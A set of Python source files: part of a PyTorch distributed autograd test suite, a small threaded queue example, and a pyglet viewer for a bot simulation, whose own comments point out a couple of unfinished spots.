        def backward(ctx, grad):
            return torch.ones(1).expand(ctx.size)
    a = torch.randn(5, 6, requires_grad=True)
    b = torch.randn(5, 6, requires_grad=True)
    # non-contiguous grad should be copied
    with dist_autograd.context() as context_id:
        dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
        grads = dist_autograd.get_gradients(context_id)
        self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
        self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
    # test case that should trigger no copy for a
    with dist_autograd.context() as context_id:
        dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
        grads = dist_autograd.get_gradients(context_id)
        p_g = MyFuncSingleGrad.static_grad_ptr
        p_a = grads[a].data_ptr()
        # Verify there was no clone.
        self.assertTrue(p_a == p_g)
    # Test case that should trigger copy for both of a,b. This is
    # different in the distributed autograd case since we hold
    # a reference to all grads in a vector until all accumulation is done.
    with dist_autograd.context() as context_id:
        dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
        grads = dist_autograd.get_gradients(context_id)
        p_g = MyFunc.static_grad_ptr
        p_a = grads[a].data_ptr()
        p_b = grads[b].data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # both should be copied.
        self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
        self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
    """Sparse analogue of test_no_grad_copy: verify when sparse grad
    buffers are stolen versus cloned during accumulation."""
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None
        @staticmethod
        def forward(ctx, inp):
            return inp
        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad._values().data_ptr()
            return grad
    class NonContGradFunc(Function):
        static_grad_ptr = None
        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2
        @staticmethod
        def backward(ctx, grad):
            # Create a sparse tensor with non-contigous indices and values
            # and return as grad.
            v = torch.rand(1, 3)
            i = torch.ones(1, 1, dtype=torch.long)
            nv = v.expand(8, 3)
            ni = i.expand(1, 8)
            ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
            NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
            return ngrad, ngrad
    a = torch.randn(10, 3, requires_grad=True)
    b = torch.randn(10, 3, requires_grad=True)
    input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
    offsets = torch.tensor([0, 4])
    import torch.nn.functional as F
    # test case that should trigger no copy for a.
    with dist_autograd.context() as context_id:
        emb_matrix = MyFunc.apply(a)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        dist_autograd.backward(context_id, [loss], retain_graph=True)
        grads = dist_autograd.get_gradients(context_id)
        p_g = MyFunc.static_grad_ptr
        p_a = grads[a]._values().data_ptr()
        # check a uses the same buffer
        self.assertTrue(p_a == p_g)
        # Run backwards multiple times.
        for i in range(10):
            dist_autograd.backward(context_id, [loss], retain_graph=True)
    # non-contiguous indices and value, we should trigger a copy.
    with dist_autograd.context() as context_id:
        emb_matrix = NonContGradFunc.apply(a, b)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        dist_autograd.backward(context_id, [loss], retain_graph=True)
        grads = dist_autograd.get_gradients(context_id)
        p_g = NonContGradFunc.static_grad_ptr
        p_a = grads[a]._values().data_ptr()
        p_b = grads[b]._values().data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # Verify we cloned both grads.
        self.assertFalse(p_a == p_g)
        self.assertFalse(p_b == p_g)
        # Run backwards multiple times to verify accumulation.
        for i in range(10):
            dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
    """Holding views of a sparse grad's indices/values must not prevent
    the engine from stealing (not cloning) the gradient buffer."""
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None
        static_grad_indices_ref = None
        static_grad_values_ref = None
        @staticmethod
        def forward(ctx, inp):
            return inp
        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad._values().data_ptr()
            # indices() and values() return views, so holding onto
            # references of them would not increment refcount of indices
            # and values inside the sparse tensor.
            MyFunc.static_grad_indices_ref = grad._indices()
            MyFunc.static_grad_values_ref = grad._values()
            return grad
    a = torch.randn(10, 3, requires_grad=True)
    input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
    offsets = torch.tensor([0, 4])
    import torch.nn.functional as F
    with dist_autograd.context() as context_id:
        emb_matrix = MyFunc.apply(a)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        dist_autograd.backward(context_id, [loss], retain_graph=True)
        grads = dist_autograd.get_gradients(context_id)
        p_g = MyFunc.static_grad_ptr
        p_a = grads[a]._values().data_ptr()
        self.assertIsNotNone(MyFunc.static_grad_indices_ref)
        self.assertIsNotNone(MyFunc.static_grad_values_ref)
        # grad would be stolen, since static_grad_indices_ref and
        # static_grad_values_ref are holding onto views and don't bump the
        # refcount.
        self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
    """Post-hooks on AccumulateGrad nodes fire during distributed backward."""
    self.hook_called_times = 0
    def post_hook_add_one(output_grads, input_grads):
        self.hook_called_times += 1
        return output_grads
    def post_hook_add_two(output_grads, input_grads):
        self.hook_called_times += 2
        return output_grads
    t = torch.rand(10, 10, requires_grad=True)
    a = t + t
    # Register post hooks
    accumulate_grad_0 = a.grad_fn.next_functions[0][0]
    accumulate_grad_0.register_hook(post_hook_add_one)
    accumulate_grad_0.register_hook(post_hook_add_two)
    accumulate_grad_1 = a.grad_fn.next_functions[1][0]
    accumulate_grad_1.register_hook(post_hook_add_two)
    with dist_autograd.context() as context_id:
        loss = a.sum()
        dist_autograd.backward(context_id, [loss])
        # 1 + 2 from the first node, plus 2 from the second.
        self.assertEqual(5, self.hook_called_times)
        grads = dist_autograd.get_gradients(context_id)
        self.assertEqual(1, len(grads))
        self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
    # Sleep so the continuation of the caller's backward pass lands on the
    # rpc.remote thread (see test_thread_local_context_id).
    time.sleep(1)
    t3 = t1 + t2
    t3.requires_grad = True
    return t3
@dist_init
def test_thread_local_context_id(self):
    """Backward continuations crossing server threads keep a valid context id."""
    t1 = torch.rand((3, 3))
    t2 = torch.rand((3, 3))
    # Local reference gradient for comparison on the remote side.
    t3 = t1 + t2
    t3.requires_grad = True
    t3.sum().backward()
    dst = worker_name((self.rank + 1) % self.world_size)
    rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
    with dist_autograd.context() as context_id:
        loss = rref.to_here().sum()
        # due to slow add, the continuation of this backward pass will be
        # invoked by the previous rpc.remote thread which does not have a
        # valid context_id. So, this can test whether we propagate
        # thread_local states properly when jumping across threads on the
        # server side.
        dist_autograd.backward(context_id, [loss])
        self.assertTrue(
            rpc.rpc_sync(
                dst,
                _compare_owner_value,
                args=(context_id, rref, t3.grad)
            )
        )
class CudaDistAutogradTest(CommonDistAutogradTest):
    """Distributed autograd tests whose graphs span CPU and GPU tensors."""

    def _gpu_simple(self, t1, t2):
        """Local vs. dist autograd for a simple add of GPU tensors."""
        my_sum(t1 + t2).backward()
        with dist_autograd.context() as context_id:
            t3 = t1 + t2
            loss = my_sum(t3)
            dist_autograd.backward(context_id, [loss])
            grads = dist_autograd.get_gradients(context_id)
            self.assertEqual(2, len(grads))
            # Distributed gradients must match the local .grad reference.
            self.assertEqual(t1.grad, grads[t1])
            self.assertEqual(t2.grad, grads[t2])
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_gpu_simple(self):
        self._gpu_simple(
            torch.rand(3, 3, requires_grad=True, device="cuda:0"),
            torch.rand(3, 3, requires_grad=True, device="cuda:0")
        )
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_gpu_simple_sparse(self):
        self._gpu_simple(
            build_sparse_tensor(requires_grad=True, device="cuda:0"),
            build_sparse_tensor(requires_grad=True, device="cuda:0")
        )
    def _gpu_to_cpu_continuation(self, t1, t2):
        """Backward over a CPU -> GPU -> CPU graph (t1 on GPU, t2 on CPU)."""
        # Run a few iterations.
        for i in range(3):
            t1.grad = None
            t2.grad = None
            # Root is CPU
            local_grads = None
            for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
                with dist_autograd.context() as context_id:
                    t3 = self._exec_func(exec_mode, torch.add, t2, t2)
                    t4 = t3.cuda(0) + t1
                    t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
                    t6 = t5.cuda(0) + t4
                    t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
                    # Autograd graph consists of CPU -> GPU -> CPU execution.
                    loss = my_sum(t7)
                    ret = self._verify_backwards(
                        exec_mode, [loss], context_id, local_grads, t1, t2
                    )
                    local_grads = ret if ret else local_grads
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_gpu_to_cpu_continuation(self):
        self._gpu_to_cpu_continuation(
            torch.rand(3, 3, requires_grad=True, device="cuda:0"),
            torch.rand(3, 3, requires_grad=True)
        )
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_gpu_to_cpu_continuation_sparse(self):
        self._gpu_to_cpu_continuation(
            build_sparse_tensor(requires_grad=True, device="cuda:0"),
            build_sparse_tensor(requires_grad=True)
        )
    def _gpu_to_cpu_continuation_gpu_root(self, t1, t2):
        """Same as _gpu_to_cpu_continuation but the loss root lives on GPU."""
        # Run a few iterations.
        for i in range(3):
            t1.grad = None
            t2.grad = None
            # Root is CPU
            local_grads = None
            for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
                with dist_autograd.context() as context_id:
                    t3 = self._exec_func(exec_mode, torch.add, t2, t2)
                    t4 = t3.cuda(0) + t1
                    t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
                    t6 = t5.cuda(0) + t4
                    # Autograd graph consists of CPU -> GPU -> CPU execution.
                    loss = my_sum(t6)
                    ret = self._verify_backwards(
                        exec_mode, [loss], context_id, local_grads, t1, t2
                    )
                    local_grads = ret if ret else local_grads
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_gpu_to_cpu_continuation_gpu_root(self):
        self._gpu_to_cpu_continuation_gpu_root(
            torch.rand(3, 3, requires_grad=True, device="cuda:0"),
            torch.rand(3, 3, requires_grad=True)
        )
    @skip_if_lt_x_gpu(1)
    @dist_init
    def test_gpu_to_cpu_continuation_gpu_root_sparse(self):
        self._gpu_to_cpu_continuation_gpu_root(
            build_sparse_tensor(requires_grad=True, device="cuda:0"),
            build_sparse_tensor(requires_grad=True)
        )
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
    """Dist autograd tests run against the fault-injecting RPC agent."""

    # Reusing a simplified helper function from DistAutogradTest to ensure
    # autograd context is successfully cleaned up even when RPCs are failing.
    def context_cleanup_test_helper(self, rpc_args, func):
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        # test that in dist autograd, in the case that tensors communicated over RPC do
        # NOT require grad, we still cleanup the dist autograd contexts created
        # on other nodes. This is because the autograd context is still
        # communicated over RPC even if tensor arguments do not require grad, as
        # it is possible that the response could.
        dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
        with dist_autograd.context() as context_id:
            for dst_rank in dst_ranks:
                rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
                rpc.rpc_sync(
                    worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
                )
        # the thread's context id should be cleaned up
        with self.assertRaises(RuntimeError):
            dist_autograd._retrieve_context(context_id)
        # Ensure all peers have finished mutating the
        # `known_context_ids` set.
        dist.barrier()
        # check that all contexts have been cleaned up.
        success = _all_contexts_cleaned_up()
        self.assertTrue(success)
    # no faulty_messages defined so this fails all retryable messages - see
    # faulty_rpc_agent_test_fixture.py for the list of retryable messages.
    @dist_init
    def test_context_cleanup_tensor_with_grad(self):
        """Contexts are cleaned up even when retryable messages fail."""
        t1 = torch.ones(3, 3, requires_grad=True)
        t2 = torch.zeros(3, 3, requires_grad=True)
        self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
    @dist_init
    def test_verify_backend_options(self):
        """The faulty TensorPipe fixture exposes the expected options."""
        self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
        self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
        self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
        self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class WrapperModule(nn.Module):
    """Wrap *model*, moving it onto *device*, and expose its parameter
    gradients from a distributed autograd context by id."""

    def __init__(self, model, device):
        super().__init__()
        self.model = model.to(device)

    def forward(self, *args):
        return self.model(*args)

    def gradients(self, ctx_id):
        grad_map = dist_autograd.get_gradients(ctx_id)
        return [grad_map[param] for param in self.model.parameters()]
class TensorPipeCudaDistAutogradTest(RpcAgentTestFixture):

    def _device_maps_backward_pass(self, t1, t2):
        """Check that backward gradients travel through the *reverse* of the
        forward device map and land on the source tensors' devices."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        # The reverse of this device mapping should be used for the backward pass.
        options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        with dist_autograd.context() as context_id:
            res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
            loss = my_sum(res)
            dist_autograd.backward(context_id, [loss])
            grads = dist_autograd.get_gradients(context_id)
            # d(sum(t1 + t2))/dt1 == d(sum(t1 + t2))/dt2 == ones.
            if t1.is_sparse:
                self.assertEqual(build_sparse_one_gradient(), grads[t1])
                self.assertEqual(build_sparse_one_gradient(), grads[t2])
            else:
                self.assertEqual(torch.ones(10), grads[t1])
                self.assertEqual(torch.ones(10), grads[t2])
            # Gradients must come back to the same devices as their sources.
            self.assertEqual(t1.device, grads[t1].device)
            self.assertEqual(t2.device, grads[t2].device)
        rpc.shutdown()

    @skip_if_lt_x_gpu(4)
    def test_device_maps_backward_pass(self):
        self._device_maps_backward_pass(
            torch.rand(10, requires_grad=True, device=self.rank),
            torch.ones(10, requires_grad=True, device=self.rank)
        )

    @skip_if_lt_x_gpu(4)
    def test_device_maps_backward_pass_sparse(self):
        self._device_maps_backward_pass(
            build_sparse_tensor(requires_grad=True, device=self.rank),
            build_sparse_tensor(requires_grad=True, device=self.rank)
        )

    class MyRemoteCompute(torch.nn.Module):
        """Remote pipeline stage: doubles its input."""
        def __init__(self):
            super().__init__()

        def forward(self, input):
            # NOTE: `input` shadows the builtin; kept as-is for compatibility.
            input = input * 2.0
            return input

    class MyLocalCompute(torch.nn.Module):
        """Local stage that synchronously forwards to a remote stage via RRef."""
        def __init__(self, next_stage):
            super().__init__()
            self.next_stage = next_stage

        def forward(self, input):
            return self.next_stage.rpc_sync().forward(input)

    def _dist_autograd_sync_streams(self, sparse):
        """Compare purely local autograd against distributed autograd through
        a remote compute stage; gradients must match across CUDA streams."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        # The reverse of this device mapping should be used for the backward pass.
        options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        remote_compute = rpc.remote(dst, TensorPipeCudaDistAutogradTest.MyRemoteCompute)
        local_compute = TensorPipeCudaDistAutogradTest.MyLocalCompute(remote_compute)
        for _ in range(10):
            if sparse:
                input = build_sparse_tensor(requires_grad=True, device=self.rank)
            else:
                input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
            # Run local autograd
            result = input * 2.0
            r = random.random()
            loss = my_sum(result) * r
            loss.backward()
            # Run distributed autograd
            with dist_autograd.context() as context_id:
                result = local_compute(input)
                loss = my_sum(result) * r
                dist_autograd.backward(context_id, [loss])
                # Compare grads.
                grads = dist_autograd.get_gradients(context_id)
                self.assertEqual(input.grad, grads[input])
        rpc.shutdown()

    @skip_if_lt_x_gpu(4)
    def test_dist_autograd_sync_streams(self):
        self._dist_autograd_sync_streams(False)

    @skip_if_lt_x_gpu(4)
    def test_dist_autograd_sync_streams_sparse(self):
        self._dist_autograd_sync_streams(True)

    def _gradients_synchronizations(self, x):
        """Rank 0 drives a model-parallel pipeline over the other ranks and
        checks the remotely computed gradients match a local baseline."""
        options = self.rpc_backend_options
        for peer_rank in range(self.world_size):
            options.set_device_map(worker_name(peer_rank), {self.rank: peer_rank})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        if self.rank == 0:
            # this is master
            layers = [nn.Linear(2000, 2000) for _ in range(self.world_size - 1)]
            local_layers = [l.to(0) for l in layers]
            remote_layers = []
            for rank in range(1, self.world_size):
                remote_layers.append(rpc.remote(
                    worker_name(rank),
                    WrapperModule,
                    args=(layers[rank - 1], rank)
                ))
            x = x.to(0)
            # local iteration
            local_model = nn.Sequential(*local_layers)
            local_model(x).sum().backward()
            # remote iteration
            with dist_autograd.context() as context_id:
                for remote_layer in remote_layers:
                    x = remote_layer.rpc_sync().forward(x)
                dist_autograd.backward(context_id, [x.sum()])
                futs = []
                for remote_layer in remote_layers:
                    futs.append(remote_layer.rpc_async().gradients(context_id))
                for i in range(len(futs)):
                    local_gradients = [p.grad for p in local_layers[i].parameters()]
                    for g1, g2 in zip(futs[i].wait(), local_gradients):
                        self.assertEqual(g1, g2)
        rpc.shutdown()

    @skip_if_lt_x_gpu(4)
    def test_gradients_synchronizations(self):
        self._gradients_synchronizations(
            torch.randn(5000, 2000)
        )

    @skip_if_lt_x_gpu(4)
    def test_gradients_synchronizations_sparse(self):
        self._gradients_synchronizations(
            torch.randn(5000, 2000).to_sparse()
        )
|
threads_queue.py | from queue import Queue
from threading import Thread
def worker(q, n):
    """Consume items from queue *q* (worker number *n*) until a ``None``
    sentinel arrives, printing each item processed."""
    # iter(q.get, None) calls q.get() repeatedly and stops at the sentinel.
    for item in iter(q.get, None):
        print(f"Processing data '{item}' from the queue #{n}")
# Bounded queue: producers block once 5 items are waiting.
q = Queue(5)
t1 = Thread(target=worker, args=(q, 1))
t2 = Thread(target=worker, args=(q, 2))
t1.start()
t2.start()
for i in range(50):
    q.put(i)  # blocks until queue has a space for a new item
# One None sentinel per consumer thread so both worker loops exit.
q.put(None)
q.put(None)
t1.join()
t2.join()
|
gui.py | from world import *
from bot import Bot
import pyglet
from pyglet.gl import *
import numpy
from threading import Thread
class GUI:
    """Pyglet-based viewer for a World simulation.

    Draws the tile grid, every bot, the focused bot's vision cones and a text
    overlay of its senses/actions.  (x, y) is the camera offset in world
    coordinates, z the zoom factor; (dx, dy, dz) are per-frame deltas driven
    by the key handlers in the main script.
    """

    GREEN_GRASS = numpy.array((0.20, 0.67, 0.13))
    BROWN_GRASS = numpy.array((0.47, 0.35, 0.10))
    SCROLL_SPEED = 5
    ZOOM_SPEED = 1.05

    def __init__(self, world, windowwidth, windowheight, x=0, y=0, z=None):
        self.ww, self.wh = windowwidth, windowheight
        self.x, self.y = x, y
        self.dx, self.dy, self.dz = 0, 0, 1
        self.world = world
        self.botvalues = None
        self.focus = None        # entity id of the focused bot, if any
        self.focusclass = None   # class of the focused bot (for refocusing)
        self.focussenses = None
        self.focusactions = None
        self.sense_label_cache = None
        self.action_label_cache = None
        self.z = z
        if z is None:
            # Derive an initial zoom that fits the whole world in the window.
            self.resize(windowwidth, windowheight)

    def resize(self, windowwidth, windowheight):
        """Recompute the zoom so the whole world fits the new window size."""
        self.ww, self.wh = windowwidth, windowheight
        # BUG FIX: previously read the module-level global `world`; use the
        # world instance this GUI was constructed with.
        worldxsize = World.TILE_SIZE * self.world.tileshape[0]
        worldysize = World.TILE_SIZE * self.world.tileshape[1]
        self.z = min(self.ww / worldxsize, self.wh / worldysize)
        # Need to rebuild labels for the new window geometry.
        self.sense_label_cache = None
        self.action_label_cache = None

    def update(self):
        """Apply the pending pan/zoom deltas to the camera."""
        # Change dx, dy
        self.x += self.dx
        self.y += self.dy
        # Change zoom
        self.z *= self.dz
        # Keep the window center fixed while zooming: cx = x + ww/2*z ...
        self.x += self.ww * (self.dz - 1) / (2 * self.z)
        self.y += self.wh * (self.dz - 1) / (2 * self.z)

    def draw_world(self):
        """Draw tiles, bots and the focus overlay for the current frame."""
        # BUG FIX: previously read the module-level global `world`; use the
        # world instance this GUI was constructed with.
        tilepercs = self.world.get_tile_percs()
        self.botvalues, fsense, fact = self.world.get_bot_values()
        if fsense is not None:
            ins, vis, dist = Bot.split_senses(fsense)
            self.focussenses = (Bot.label_inputs(ins), vis, dist)
        else:
            self.focussenses = None
        if fact is not None:
            self.focusactions = Bot.label_actions(fact)
        else:
            self.focusactions = None
        for i in range(self.world.tileshape[0]):
            for j in range(self.world.tileshape[1]):
                x = i * World.TILE_SIZE
                y = j * World.TILE_SIZE
                self._draw_tile(x, y, tilepercs[i,j])
        for i in range(self.botvalues.shape[0]):
            eid = self.botvalues[i,0]
            if eid != self.focus:
                self._draw_bot(self.botvalues[i,:])
            else:
                self._draw_bot(self.botvalues[i,:], focus=True,
                    focussenses=self.focussenses, focusactions=self.focusactions)
        self._draw_debug(self.focussenses, self.focusactions)
        # If the focused bot vanished (no senses/actions), refocus on any
        # surviving bot of the same class.
        if self.focussenses is None and self.focusactions is None:
            for i in range(self.botvalues.shape[0]):
                eid, ecls, ex, ey, ed, er, eg, eb = self.botvalues[i,:]
                if ecls == self.focusclass:
                    self.focus = self.botvalues[i,0]

    def _draw_tile(self, x, y, energyperc, size=World.TILE_SIZE):
        """Draw one grass tile, colored by its energy percentage."""
        # Lerp between brown (empty) and green (full).
        r, g, b = (GUI.GREEN_GRASS - GUI.BROWN_GRASS) * energyperc + GUI.BROWN_GRASS
        glLoadIdentity()
        glTranslatef(self.z * (x - self.x), self.z * (y - self.y), 0.0)
        glScalef(size * self.z, size * self.z, 1.0)
        glColor4f(r, g, b, 1.0)
        glBegin(GL_QUADS)
        glVertex2f(0, 0)
        glVertex2f(1, 0)
        glVertex2f(1, 1)
        glVertex2f(0, 1)
        glEnd()
        # Black tile outline.
        glColor4f(0, 0, 0, 1)
        glBegin(GL_LINE_LOOP)
        glVertex2f(0, 0)
        glVertex2f(1, 0)
        glVertex2f(1, 1)
        glVertex2f(0, 1)
        glEnd()

    def _draw_bot(self, botinfo, size=World.ENTITY_SIZE, focus=False, focussenses=None, focusactions=None, drawvis=False):
        """Draw one bot triangle; optionally its vision cones and focus ring."""
        eid, ecls, x, y, d, r, g, b = botinfo
        glLoadIdentity()
        glTranslatef(self.z * (x - self.x), self.z * (y - self.y), 0.0)
        glScalef(self.z * size, self.z * size, 1.0)
        glRotatef(d - 90.0, 0, 0, 1)
        glColor4f(r, g, b, 1.0)
        # Bot body.  BUG FIX: glVertex2f takes two coordinates; the stray
        # third argument has been dropped.
        glBegin(GL_TRIANGLES)
        glVertex2f(-0.3, -0.5)
        glVertex2f(0.3, -0.5)
        glVertex2f(0.0, 0.5)
        glEnd()
        if focus or drawvis:
            if focussenses is not None:
                senses, vis, dist = focussenses
            else:
                senses, vis, dist = None, None, None
            hasdist = dist is not None
            hasvis = vis is not None
            # Vision cones: one translucent triangle per vision bin, scaled by
            # the sensed distance when available.
            vbins = Bot.VISION_BINS
            vlow = -Bot.FOV
            vhigh = Bot.FOV
            binangle = (vhigh - vlow) / vbins
            vdist = Bot.VIEW_DIST / size
            glEnable(GL_BLEND)
            glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
            glColor4f(r, g, b, 0.25)
            glBegin(GL_TRIANGLES)
            for i in range(vbins):
                angleindx = i
                lowangle = binangle*angleindx + vlow
                highangle = binangle*(angleindx+1) + vlow
                # Add 90.0 since bot-drawings are vertical, not rightwards
                lowx = vdist * numpy.cos(numpy.deg2rad(lowangle + 90.0)) * (dist[i] if hasdist else 1.0)
                lowy = vdist * numpy.sin(numpy.deg2rad(lowangle + 90.0)) * (dist[i] if hasdist else 1.0)
                highx = vdist * numpy.cos(numpy.deg2rad(highangle + 90.0)) * (dist[i] if hasdist else 1.0)
                highy = vdist * numpy.sin(numpy.deg2rad(highangle + 90.0)) * (dist[i] if hasdist else 1.0)
                if hasvis:
                    # Color code what the bin sees: black=nothing, red=-1, blue=+1.
                    if vis[i] == 0:
                        glColor4f(0., 0., 0., 0.25)
                    elif vis[i] == -1:
                        glColor4f(1., 0., 0., 0.25)
                    elif vis[i] == 1:
                        glColor4f(0., 0., 1., 0.25)
                glVertex2f(0, 0)
                glVertex2f(lowx, lowy)
                glVertex2f(highx, highy)
            glEnd()
            glDisable(GL_BLEND)
        if focus:
            self._draw_circle(100)

    def _draw_circle(self, npoints):
        """Draw a red unit-circle outline (focus marker) with npoints segments."""
        angl = (2.0*numpy.pi)/npoints
        glColor4f(1.0, 0.0, 0.0, 1.0)
        glBegin(GL_LINE_LOOP)
        for i in range(npoints):
            glVertex2f(numpy.cos(i*angl), numpy.sin(i*angl))
        glEnd()

    def _draw_debug(self, senses, actions, font_size=12):
        """Draw the sense labels (top-left) and action labels (bottom-left)."""
        glLoadIdentity()
        if senses is not None:
            sense, vis, dist = senses
        else:
            sense, vis, dist = None, None, None
        if sense is not None:
            if self.sense_label_cache is None:
                # Labels are expensive to build; cache one per sense key.
                self.sense_label_cache = []
                for i, k in enumerate(sorted(sense)):
                    label = pyglet.text.Label("",
                        font_name='Times New Roman', font_size=font_size,
                        x=10, y=self.wh - ((i+1) * (font_size + 5)),
                        color=[255, 255, 255, 255])
                    self.sense_label_cache.append(label)
            for label, k in zip(self.sense_label_cache, sorted(sense)):
                label.text = "{}:\t{:5.5f}".format(k, sense[k])
                label.draw()
        if actions is not None:
            if self.action_label_cache is None:
                self.action_label_cache = []
                for i, k in enumerate(reversed(sorted(actions))):
                    label = pyglet.text.Label("",
                        font_name='Times New Roman', font_size=font_size,
                        x=10, y=(i+0.1)*(font_size + 5),
                        color=[255,255,255,255])
                    self.action_label_cache.append(label)
            for label, k in zip(self.action_label_cache, reversed(sorted(actions))):
                label.text = "{}:\t{:5.5f}".format(k, actions[k])
                label.draw()

    def add_translate(self, dx, dy):
        """Add to the per-frame pan delta (key press adds, release subtracts)."""
        self.dx += dx
        self.dy += dy

    def set_zoom(self, dz):
        """Set the per-frame zoom multiplier (1 = no zoom)."""
        self.dz = dz

    def selectnear(self, x, y):
        """Focus the bot closest to window coordinates (x, y)."""
        mapx = (x/self.z) + self.x
        mapy = (y/self.z) + self.y
        # BUG FIX: used sys.maxsize but `sys` is not imported in this module.
        closestd2 = float("inf")
        for i in range(self.botvalues.shape[0]):
            eid, ecls, ex, ey, ed, er, eg, eb = self.botvalues[i,:]
            dist2 = (mapx - ex)**2 + (mapy - ey)**2
            if dist2 < closestd2:
                self.focus = int(eid)
                closestd2 = dist2
                self.focusclass = ecls

    def get_focus(self):
        """Return the entity id of the currently focused bot (or None)."""
        return self.focus
# Python multithreading slows stuff down, probably mutex starving. Will swap to RLmutex
SINGLE_THREAD = True

if __name__ == "__main__":
    # make_model() is expected from `from world import *` — not visible here.
    world = make_model()
    try:
        world.startup()
        world.update(1)
        win = pyglet.window.Window(1750, 1750, resizable=True)
        fps_display = pyglet.clock.ClockDisplay(format='%(fps).2f fps')
        gui = GUI(world, win.width, win.height)
        if not SINGLE_THREAD:
            # NOTE(review): `updatewithfocus` is built but the thread is
            # started with the bare `update` — confirm which was intended.
            updatewithfocus = lambda world: update(world, getfocus=gui.get_focus)
            t = Thread(target=update, args=(world,))
            t.start()
        else:
            # Drive the world from pyglet's clock on the main thread.
            updatewithfocus = lambda dt: world.update(dt, gui.get_focus())
            pyglet.clock.schedule(updatewithfocus)

        @win.event
        def on_draw():
            pyglet.clock.tick()
            gui.update()
            win.clear()
            gui.draw_world()

        @win.event
        def on_key_press(symbol, modifiers):
            # Arrows pan, Q/E zoom; the matching release handler undoes these.
            if symbol == pyglet.window.key.LEFT:
                gui.add_translate(-GUI.SCROLL_SPEED, 0)
            elif symbol == pyglet.window.key.RIGHT:
                gui.add_translate(GUI.SCROLL_SPEED, 0)
            elif symbol == pyglet.window.key.UP:
                gui.add_translate(0, GUI.SCROLL_SPEED)
            elif symbol == pyglet.window.key.DOWN:
                gui.add_translate(0, -GUI.SCROLL_SPEED)
            elif symbol == pyglet.window.key.Q:
                gui.set_zoom(1. / GUI.ZOOM_SPEED)
            elif symbol == pyglet.window.key.E:
                gui.set_zoom(GUI.ZOOM_SPEED)
            elif symbol == pyglet.window.key.D:
                # NOTE(review): GUI defines no set_debug/debug attribute, so
                # pressing D will raise AttributeError — confirm intended.
                gui.set_debug(not gui.debug)

        @win.event
        def on_key_release(symbol, modifiers):
            if symbol == pyglet.window.key.LEFT:
                gui.add_translate(GUI.SCROLL_SPEED, 0)
            elif symbol == pyglet.window.key.RIGHT:
                gui.add_translate(-GUI.SCROLL_SPEED, 0)
            elif symbol == pyglet.window.key.UP:
                gui.add_translate(0, -GUI.SCROLL_SPEED)
            elif symbol == pyglet.window.key.DOWN:
                gui.add_translate(0, GUI.SCROLL_SPEED)
            elif symbol == pyglet.window.key.Q:
                gui.set_zoom(1)
            elif symbol == pyglet.window.key.E:
                gui.set_zoom(1)

        @win.event
        def on_mouse_press(x, y, button, modifiers):
            if button == pyglet.window.mouse.LEFT:
                print('The left mouse button was pressed: {},{}'.format(x, y))
